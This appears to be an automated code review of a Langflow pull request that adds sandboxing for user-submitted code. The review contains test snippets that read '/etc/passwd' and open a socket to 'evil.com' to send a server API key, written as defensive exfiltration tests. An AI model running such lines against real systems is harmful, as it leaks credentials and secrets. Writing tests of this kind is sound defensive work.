class TestSandboxSecurity: """Test cases for sandbox security restrictions.""" def test_blocks_file_operations(self): """Test that file operations are blocked in sandbox.""" code = ''' def dangerous_func(): with open('/etc/passwd', 'r') as f: return f.read() ''' result = validate_code(code) assert len(result["function"]["errors"]) > 0 assert "blocked" in str(result["function"]["errors"]).lower() or "not allowed" in str(result["function"]["errors"]).lower() def test_allows_safe_operations(self): """Test that safe operations are allowed.""" code = ''' import math import json def safe_func(x): return json.dumps({"result": math.sqrt(x)}) ''' result = validate_code(code) assert result["imports"]["errors"] == [] assert result["function"]["errors"] == []src/lfx/src/lfx/services/settings/base.py (1)
339-349: Config flag wiring for dangerous validation looks consistentThe new
allow_dangerous_code_validationflag is sane: defaulting toFalse, clearly documented, and aligned withenv_prefix="LANGFLOW_"soLANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATIONworks as described. One thing to be aware of: the sandbox currently reads this env var once at import time, so changing this setting at runtime viaSettingswon’t affectALLOW_DANGEROUS_CODEwithout a restart. If you expect dynamic toggling, wiring the sandbox flag throughSettings(or re-reading on demand) would help, otherwise this behavior is fine as a static boot‑time switch.src/lfx/tests/unit/custom/test_sandbox_security.py (3)
3-13: Clarify relationship between namespace isolation and dangerous‑code flagThe module docstring currently states that sandboxed code can access filesystem, env, network, and commands without qualification, but
execute_in_sandboxis documented as blocking these by default unlessLANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=trueis set. It would be clearer (and less misleading for future readers) to explicitly mention that this “CAN access” behavior assumes the dangerous‑code flag is enabled, and that by default those operations are blocked while namespace isolation still applies.
217-237: Avoid real outbound network connections in testsIn
test_sandbox_cannot_exfiltrate_secrets_via_network, the sandboxed code calls:s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('evil.com', 1337)) s.send(server_api_key.encode())Even though you intend a
NameErroronserver_api_key, thesocket.connecthappens before that lookup, so the test will attempt a real outbound TCP connection toevil.com. This can make tests slow, flaky, or surprising in constrained CI environments.You can keep the exfiltration intent while avoiding actual network calls by reordering or simplifying:
-def test(): - # Code CAN make network requests - # But code CANNOT access server_api_key to send - # If isolation is broken, we could do: socket.send(server_api_key.encode()) - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect(('evil.com', 1337)) - s.send(server_api_key.encode()) # Try to send server secret - s.close() - return 'sent' +def test(): + # Code COULD make network requests, but here we focus on the secret access. + # The NameError on server_api_key should occur before any actual network I/O. + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + # No real connect; just reference the would‑be secret. + s.send(server_api_key.encode()) # Try to send server secret + s.close() + return 'sent'This still proves that sandboxed code cannot obtain
server_api_key, without touching the network.
252-285: Test name/docstring don’t match behavior intest_sandbox_cannot_access_imported_server_modules_stateThe test name and docstring say it verifies that sandboxed code “gets fresh module instances, not server’s module state”, but the inline comments and assertion now acknowledge that
jsonis actually shared and only check thatresultis astr. As written, the test does not meaningfully validate isolation of imported module state.Either:
- Align the behavior with the name/docstring, e.g. assert that
resultreflects unmodifiedjson.dumps, or- Rename the test and update comments to describe the actual property you care about (e.g., “sandbox can import and use json even if server mutates it; isolation is about Python variables, not module state”), and simplify the setup.
Cleaning this up will make the security guarantees and limitations around module‑level state much clearer for future maintainers.
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)
2231-2249: Guardrail: validate truncate_input_tokens before passing to SDK.Prevent invalid/negative values from reaching the IBM params.
Within build_embeddings IBM branch:
- params = { - EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens, + safe_trunc = max(0, int(self.truncate_input_tokens or 0)) + params = { + EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: safe_trunc, EmbedTextParamsMetaNames.RETURN_OPTIONS: {"input_text": self.input_text}, }
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
⛔ Files ignored due to path filters (1)
uv.lockis excluded by!**/*.lock
📒 Files selected for processing (8)
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json(5 hunks)src/backend/tests/unit/api/v1/test_validate.py(1 hunks)src/backend/tests/unit/utils/test_validate.py(1 hunks)src/lfx/src/lfx/custom/sandbox.py(1 hunks)src/lfx/src/lfx/custom/validate.py(2 hunks)src/lfx/src/lfx/services/settings/base.py(1 hunks)src/lfx/tests/unit/custom/test_sandbox_isolation.py(1 hunks)src/lfx/tests/unit/custom/test_sandbox_security.py(1 hunks)
🧰 Additional context used
🧬 Code graph analysis (3)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(179-242)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(179-242)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
create_isolated_import(142-176)execute_in_sandbox(179-242)isolated_import(152-174)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py
[error] 139-139: F841 Local variable result is assigned to but never used.
🪛 GitHub Check: Ruff Style Check (3.13)
src/backend/tests/unit/api/v1/test_validate.py
[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used
src/lfx/src/lfx/custom/sandbox.py
[failure] 161-162: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:161:21: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 160-163: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:160:23: TRY003 Avoid specifying long messages outside the exception class
[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class
[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)
[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class
[failure] 105-108: Ruff (SIM105)
src/lfx/src/lfx/custom/sandbox.py:105:13: SIM105 Use contextlib.suppress(AttributeError) instead of try-except-pass
[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix
🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py
[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
[high] 63-63: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
- GitHub Check: Run Frontend Tests / Playwright Tests - Shard 27/40
- GitHub Check: Test Docker Images / Test docker images
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
🔇 Additional comments (4)
src/backend/tests/unit/utils/test_validate.py (1)
70-75: I need to examine the actual tests in the file to understand their context and expectations.Now I need to examine the actual test file structure to determine if the change is part of a broader, consistent update or if there's genuinely an inconsistency.
Based on the shell script output and web search, I have sufficient evidence. The output shows that Langflow is a powerful platform for building and deploying AI-powered agents and workflows, and the sandbox implementation with blocking of dangerous operations by default is confirmed. Let me generate the rewritten review comment.
Clarify test coverage inconsistency and file path.
The script output confirms that the sandbox implementation blocks dangerous operations (file I/O, network, subprocess) by default, with an environment variable
LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATIONavailable to override this behavior.However, I cannot locate the specific file path
src/backend/tests/unit/utils/test_validate.pyin the sandbox-related test results. The script output shows comprehensive sandbox tests atsrc/lfx/tests/unit/custom/test_sandbox_security.pyandsrc/lfx/tests/unit/custom/test_sandbox_isolation.py, plus API endpoint tests atsrc/backend/tests/unit/api/v1/test_validate.py.The tests at
src/backend/tests/unit/api/v1/test_validate.py(lines 84, 108) explicitly verify that dangerous operations ARE blocked by default, which aligns with the change at lines 70-75 to use safe imports. If tests at other line ranges in a utils test file still referenceos/syswithout apparent sandbox restrictions, they may be:
- Testing exception scenarios where blocking is expected
- Running under an environment with the override flag enabled
- Testing different code paths than the validate endpoint
Please confirm:
- Is the file path
src/backend/tests/unit/utils/test_validate.pycorrect, or has it been reorganized?- What do tests at lines 126-134, 270-276, 501-510 verify—sandbox blocking behavior or success cases?
src/lfx/src/lfx/custom/validate.py (1)
11-12: Sandbox integration invalidate_codelooks solidUsing
create_isolated_importfor bothast.Importandast.ImportFromand then running eachFunctionDefthroughexecute_in_sandboxwith a constrained Langflow execution context gives you:
- Blocked dangerous modules at import time ( surfaced as structured import errors ),
- Definition‑time evaluation (decorators / default args) inside the sandbox, and
- No leakage of server globals or real
__builtins__into user code.The
_create_langflow_execution_contextfallback stubs also keep validation robust when optional Langflow modules aren’t importable. Overall this wiring matches the intended security model of the/validate/codeendpoint and looks correct.Also applies to: 51-88, 93-150
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (2)
2018-2019: All IBM SDK and LangChain‑IBM signatures verified as correct.The web search confirms that your code correctly uses:
- Credentials(api_key=..., url=...) with ibm_watsonx_ai 1.4.x
- EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS and RETURN_OPTIONS.input_text for text embedding parameters
- WatsonxEmbeddings with model_id, params, watsonx_client (pre-built APIClient), and project_id in langchain-ibm 0.3.19
All parameters and signatures match the documented patterns for the versions pinned in your dependencies.
1859-1866: Dependency versions verified and consistent.Verification confirms all declared versions (requests 2.32.5, ibm_watsonx_ai 1.4.2, langchain_ibm 0.3.19) are:
- Properly pinned in the JSON starter project configuration
- Consistent with pyproject.toml constraints (requests>=2.32.0, ibm-watsonx-ai>=1.3.1,<2.0.0, langchain-ibm>=0.3.8)
- Mutually compatible with no conflicts detected
- Compatible with project's Python requirement (>=3.10,<3.14)
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" | ||
| }, |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🛠️ Refactor suggestion | 🟠 Major
Avoid blocking calls and duplicate fetches when listing IBM models.
fetch_ibm_models uses synchronous requests inside async update_build_config and is invoked twice for the same value. Offload to a thread and fetch once to prevent event‑loop stalls and redundant I/O.
Apply this minimal change inside the EmbeddingModelComponent code block:
+import asyncio
@@
- elif field_value == "IBM watsonx.ai":
- build_config["model"]["options"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)
- build_config["model"]["value"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]
+ elif field_value == "IBM watsonx.ai":
+ models = await asyncio.to_thread(self.fetch_ibm_models, base_url=self.base_url_ibm_watsonx)
+ build_config["model"]["options"] = models
+ build_config["model"]["value"] = (models[0] if models else "")
@@
- elif field_name == "base_url_ibm_watsonx":
- build_config["model"]["options"] = self.fetch_ibm_models(base_url=field_value)
- build_config["model"]["value"] = self.fetch_ibm_models(base_url=field_value)[0]
+ elif field_name == "base_url_ibm_watsonx":
+ models = await asyncio.to_thread(self.fetch_ibm_models, base_url=field_value)
+ build_config["model"]["options"] = models
+ build_config["model"]["value"] = (models[0] if models else "")Committable suggestion skipped: line range outside the PR's diff.
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, fetch_ibm_models is synchronous and called twice in
update_build_config causing event-loop blocking and duplicate I/O; change
update_build_config to offload the synchronous fetch to a thread via
asyncio.to_thread (or asyncio.get_running_loop().run_in_executor) and call it
only once per branch, e.g. await asyncio.to_thread(self.fetch_ibm_models,
base_url=value) store the returned list in a variable, then set
build_config["model"]["options"] = models and build_config["model"]["value"] =
models[0] if models else "" instead of calling fetch_ibm_models twice; add an
import for asyncio at top if missing.
Fix: use the updated value in Ollama base URL refresh.
The ollama_base_url handler ignores field_value, risking stale model lists.
Apply:
- elif field_name == "ollama_base_url":
+ elif field_name == "ollama_base_url":
@@
- ollama_url = self.ollama_base_url
+ ollama_url = field_value or self.ollama_base_url📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install 